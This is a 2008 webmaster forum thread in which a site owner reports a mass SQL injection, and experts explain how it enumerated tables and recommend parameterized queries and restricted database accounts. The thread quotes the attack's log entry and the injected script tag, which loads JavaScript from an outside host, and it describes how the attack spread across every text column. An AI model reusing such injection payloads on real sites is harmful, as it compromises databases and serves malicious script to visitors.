 |
 | Home | Contact Us | FAQ | Search & Site Map | Link to Us |
 | Sign In | Join | Other 45 Sites in Network |
| HomeDiscussion GroupsGeneralPHPASPPerlColdFusionFlashHTML, CSS, ScriptsBrowsers |
Webmaster Forum / ASP / General ASP Topics / July 2008SQL Injection
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - - GET /sresult.asp title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src= http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - My table was evidently hit with SQL Injection. I searched the IIS logs and found hundreds of the below instances. Questions... 1) The end result was my image columns were updated to reflect: Original data: files/icons/ps987_75.jpg Updated data: files/icons/ps987_75.jpg<script src=http://www.advabnr.com/b.js></script> Thousands of records were updated like the above. I tried downloading http://www.advabnr.com/b.js to see what's inside, but it wasn't available. What could have been in the js file to cause such an update? 2) I don't see how they could have known the Table name or the column names. Same question as #1 I guess. 3) I was and still am using a stored procedure on that page to SELECT from the table. How do I stop similar malicious efforts from happening again? thanks > - - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - - > GET /sresult.asp [quoted text clipped - 13 lines] > but it wasn't available. > What could have been in the js file to cause such an update? http://mvp.unixwiz.net/techtips/sql-injection.html http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23 http://www.nextgenss.com/papers/advanced_sql_injection.pdf http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf > 2) I don't see how they could have known the Table name or the column > names. Same question as #1 I guess. Same answer - by causing error messagess that poor coding practice allow to be returned to the user. > 3) I was and still am using a stored procedure on that page to SELECT > from the table. How do I stop similar malicious efforts from happening > again? Use parameters: http://groups.google.com/group/microsoft.public.scripting.vbscript/msg/61fedf4e1 efd63a6  SignatureMicrosoft MVP - ASP/ASP.NET Please reply to the newsgroup. This email account is my spam trap so I don't check it very often. If you must reply off-line, then remove the "NO SPAM" > > 2) I don't see how they could have known the Table name or the column > > names. Same question as #1 I guess. > > Same answer - by causing error messagess that poor coding practice allow to > be returned to the user. No, not really. Oh, it's poor coding practice, but the original injection (not seen here) is code that goes and reads the system tables and tries to discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the JavaScript into all those fields. It's pretty sophisiticated, actually. But it's easily protected against by simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx accounts. (Well, and of course by practicing good programming of the ASP page in the first place. But even with poor ASP code, if you set up the DB correctly the particular attack fails.) If you care, I think I can find a copy of the actual injection attack code still lurking, showing how it loops on all the tables and fields. >>> 2) I don't see how they could have known the Table name or the >>> column names. Same question as #1 I guess. [quoted text clipped - 7 lines] > VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the > JavaScript into all those fields. Yes, that's the other way, and it is covered in the links I provided, which is what I meant by "same answer". > It's pretty sophisiticated, actually. But it's easily protected > against by simply disallowing access to the sytem tables from the > IUSR_xxx and IWAM_xxx accounts. ... or whatever account is being used to connect to sql server. > (Well, and of course by practicing > good programming of the ASP page in the first place. But even with [quoted text clipped - 3 lines] > If you care, I think I can find a copy of the actual injection attack > code still lurking, showing how it loops on all the tables and fields. I've seen it - I just hadn't put the two cases together SignatureMicrosoft MVP - ASP/ASP.NET Please reply to the newsgroup. This email account is my spam trap so I don't check it very often. If you must reply off-line, then remove the "NO SPAM" "It's pretty sophisiticated, actually. But it's easily protected against by simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx accounts. (Well, and of course by practicing good programming of the ASP page in the first place. But even with poor ASP code, if you set up the DB correctly the particular attack fails.)" I aplogize in advance if this is a stupid question, but in SQL Server 2005, how do you deny access for the IUSR and IWAM accounts? Thanks, Adam > > > 2) I don't see how they could have known the Table name or the column > > > names. Same question as #1 I guess. [quoted text clipped - 15 lines] > If you care, I think I can find a copy of the actual injection attack code > still lurking, showing how it loops on all the tables and fields. > I aplogize in advance if this is a stupid question, but in > SQL Server 2005, how do you deny access for the IUSR and > IWAM accounts? The same way you do any other accounts. But most of us do not use trusted connections for our web apps, meaning that the login used in your connection string should have restricted rights. In our case, we almost always give that login NO RIGHTS, then grant EXECUTE permissions on a procedure-byprocedure basis. SignatureDave Anderson Unsolicited commercial email will be read at a cost of $500 per message. Use of this email address implies consent to these terms. Here's an example of how it was originally injected into at least one web site and thus database: http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984 The next post is my decoding of that and then Xander's post has a link to here: http://isc.sans.org/diary.html?n&storyid=4294 that explains the whole process even more. > Here's an example of how it was originally injected into at least one web > site and thus database: [quoted text clipped - 5 lines] > http://isc.sans.org/diary.html?n&storyid=4294 > that explains the whole process even more. The interesting thing is that ww.aspfaq.com, which is mentioned in the thread you linked to appears to have been a victim of something similar. Google results warn that aspfaq may harm your computer.... -- Mike Brind Microsoft MVP - ASP/ASP.NET >> Here's an example of how it was originally injected into at least one web >> site and thus database: [quoted text clipped - 9 lines] > thread you linked to appears to have been a victim of something similar. > Google results warn that aspfaq may harm your computer.... Ah. Not the one mentioned in the thread (which is plural).... but the one that is frequently linked to from here. >>> Here's an example of how it was originally injected into at least >>> one web site and thus database: http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984 >>> The next post is my decoding of that and then Xander's post has a >>> link to here: [quoted text clipped - 7 lines] > Ah. Not the one mentioned in the thread (which is plural).... but > the one that is frequently linked to from here. Oh my! That is embarassing! I know Aaron used to recommend the use of dynamic sql to execute stored procedures ... I'm sure he followed what he preached, but I would have thought he knew to use a limited-privileges account to connect to SQL. I'm going to give him the benefit of the doubt and place the blame on the company that bought the aspfaq site from him. SignatureMicrosoft MVP -- ASP/ASP.NET Please reply to the newsgroup. The email account listed in my From header is my spam trap, so I don't check it very often. You will get a quicker response by posting to the newsgroup. >>> Here's an example of how it was originally injected into at least >>> one web site and thus database: [quoted text clipped - 9 lines] >> the thread you linked to appears to have been a victim of something >> similar. Google results warn that aspfaq may harm your computer.... They seem to have cleared that up. No more Google warnings there. SignatureMicrosoft MVP - ASP/ASP.NET Please reply to the newsgroup. This email account is my spam trap so I don't check it very often. If you must reply off-line, then remove the "NO SPAM" >>>> Here's an example of how it was originally injected into at least >>>> one web site and thus database: [quoted text clipped - 11 lines] > > They seem to have cleared that up. No more Google warnings there. That is indeed a relief. Mike I have the solution to this problem... I work at a news channal. Recently we launch our news websit and it was DAILY ATTACKED this script. as a result, we used to restore the privous database backup to avoid this problem. But after research, i have written a script for every table effected. Now that the website is smoothly working. I can provide this solution to you as well, but i will charge money for it. For contact my e-mail address is hammad_siddiqui@yahoo.com. > I have the solution to this problem... > [quoted text clipped - 6 lines] > I can provide this solution to you as well, but i will charge money > for it. For contact my e-mail address is hammad_siddiqui@yahoo.com. LOLOLOLOLOL ROFL There are freely available scripts in several places. I hope nobody finances this leech. SignatureMicrosoft MVP - ASP/ASP.NET Please reply to the newsgroup. This email account is my spam trap so I don't check it very often. If you must reply off-line, then remove the "NO SPAM" > I have the solution to this problem... > [quoted text clipped - 6 lines] > I can provide this solution to you as well, but i will charge money for > it. For contact my e-mail address is rip_off_merchant@yahoo.com. If I launched a web site that was attacked like this, I would expect to be fired or sued - not charge people money for fixing my mistakes. -- Mike Brind Microsoft MVP - ASP/ASP.NET It is one type of virus.use trigger and check inserted data.use this code Create TRIGGER [Check_Code] ON [EPI_TenderDetails] after INSERT,UPDATE AS declare @Bus varchar(150) BEGIN -- SET NOCOUNT ON added to prevent extra result sets from -- interfering with SELECT statements. SET NOCOUNT ON; if exists (select * from inserted) select @Bus=TenderNo from inserted if @bus like '%<script%' or @bus like '%script>%' rollback -- Insert statements for trigger here END > ...if exists (select * from inserted) > select @Bus=TenderNo from inserted > if @bus like '%<script%' or @bus like '%script>%' > rollback > -- Insert statements for trigger here ... This does not address the core problem. Reaching your trigger implies that injection has occurred. There is no guarantee that the next attack will use SCRIPT tags. For that matter, this nonsense forbids potential legitimate cases for inserting SCRIPT tags. Imagine if a SQL injection forum kept rejecting your post because you described the thing it was "protecting itself" against. Bah. SignatureDave Anderson Unsolicited commercial email will be read at a cost of $500 per message. Use of this email address implies consent to these terms. |
Reply to this Message |
 Sign In
 Join
 My Latest Posts My Monitored Threads My Blog My Photo Gallery My Profile My Homepage Start New Thread Enable EMail Alerts Rate this Thread
|
©2008 Advenet LLC Privacy Policy - Terms of Use
This website includes both content owned or controlled by Advenet as well as content owned or controlled by third parties.